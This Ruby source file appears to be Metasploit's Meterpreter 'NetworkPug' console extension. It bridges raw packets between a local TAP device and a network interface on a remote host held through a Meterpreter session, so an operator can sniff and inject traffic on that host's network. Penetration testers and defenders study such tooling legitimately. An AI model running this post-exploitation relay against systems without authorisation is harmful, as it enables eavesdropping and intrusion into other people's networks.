require 'rex/post/meterpreter' module Rex module Post module Meterpreter module Ui # Rex::Ui::Text::IrbShell.new(binding).run class Console::CommandDispatcher::NetworkPug Klass = Console::CommandDispatcher::NetworkPug include Console::CommandDispatcher @@options = Rex::Parser::Arguments.new( "-i" => [ true, "Interface on remote machine to listen on" ], "-f" => [ true, "Additional pcap filtering mechanism" ], "-v" => [ false, "Virtual NIC (packets only for your TAP dev locally)" ] ) def initialize(shell) @thread_stuff = nil @tapdev = nil @channel = nil super end attr_accessor :thread_stuff attr_accessor :tapdev attr_accessor :channel # # List of supported commands. # def commands { "networkpug_start" => "Start slinging packets between hosts", "networkpug_stop" => "Stop slinging packets between hosts", } end def setup_tapdev # XXX, look at how to use windows equivilient and include tapdev = ::File.open("/dev/net/tun", "wb+") 0.upto(16) { |idx| name = "npug#{idx}" ifreq = [ name, 0x1000 | 0x02, "" ].pack("a16va14") begin tapdev.ioctl(0x400454ca, ifreq) # is there a better way than hex constant rescue Errno::EBUSY next end ifreq = [ name ].pack("a32") tapdev.ioctl(0x8927, ifreq) # print_line(Rex::Text.hexify(ifreq)) mac = sprintf("%02x:%02x:%02x:%02x:%02x:%02x", ifreq[18], ifreq[19], ifreq[20], ifreq[21], ifreq[22], ifreq[23]) return tapdev, name, mac } tapdev.close() return nil, nil, nil end def proxy_packets() while 1 # Ghetto :\ sd = Rex::ThreadSafe.select([ @channel.lsock, @tapdev ], nil, nil) sd[0].each { |s| if(s == @channel.lsock) # Packet from remote host to local TAP dev len = @channel.lsock.read(2) len = len.unpack('n')[0] #print_line("Got #{len} bytes from remote host's network") if(len > 1514 or len == 0) @tapdev.close() print_line("length is invalid .. #{len} ?, de-synchronized ? ") end packet = @channel.lsock.read(len) print_line("packet from remote host:\n" + Rex::Text.hexify(packet)) @tapdev.syswrite(packet) elsif(s == @tapdev) # Packet from tapdev to remote host network packet = @tapdev.sysread(1514) print_line("packet to remote host:\n" + Rex::Text.hexify(packet)) @channel.write(packet) end } if(sd) if(not sd) print_line("hmmm. ") end end end def cmd_networkpug_start(*args) # PKS - I suck at ruby ;\ virtual_nic = false filter = nil interface = nil if(args.length == 0) args.unshift("-h") end @@options.parse(args) { |opt, idx, val| # print_line("before: #{opt} #{idx} #{val} || virtual nic: #{virtual_nic}, filter: #{filter}, interface: #{interface}") case opt when "-v" virtual_nic = true when "-f" filter = val when "-i" interface = val when "-h" print_error("Usage: networkpug_start -i interface [options]") print_error("") print_error(@@options.usage) end # print_line("after: #{opt} #{idx} #{val} || virtual nic: #{virtual_nic}, filter: #{filter}, interface: #{interface}") } if (interface == nil) print_error("Usage: networkpug_start -i interface [options]") print_error("") print_error(@@options.usage) return end @tapdev, tapname, mac = setup_tapdev if(@tapdev == nil) print_status("Failed to create tapdev") return end # PKS, we should implement multiple filter strings and let the # remote host build it properly. # not (our conn) and (virtual nic filter) and (custom filter) # print_line("before virtual, filter is #{filter}") if(filter == nil and virtual_nic == true) filter = "ether host #{mac}" elsif(filter != nil and virtual_nic == true) filter += " and ether host #{mac}" #print_line("Adjusted filter is #{filter}") end print_line("#{tapname} created with a hwaddr of #{mac}, ctrl-c when done") response, @channel = client.networkpug.networkpug_start(interface, filter) if(@channel) @thread_stuff = ::Thread.new { proxy_packets() } print_line("Packet slinger for #{interface} has a thread structure of #{@thread_stuff}") end return true end def cmd_networkpug_stop(*args) interface = args[0] if (interface == nil) print_error("Usage: networkpug_stop [interface]") return end if(@thread_stuff) ::Thread.kill(@thread_stuff) ::Thread.join(@thread_stuff) @thread_stuff = nil @channel.close @tapdev.close end client.networkpug.networkpug_stop(interface) print_status("Packet slinging stopped on #{interface}") return true end def name "NetworkPug" end end end end end end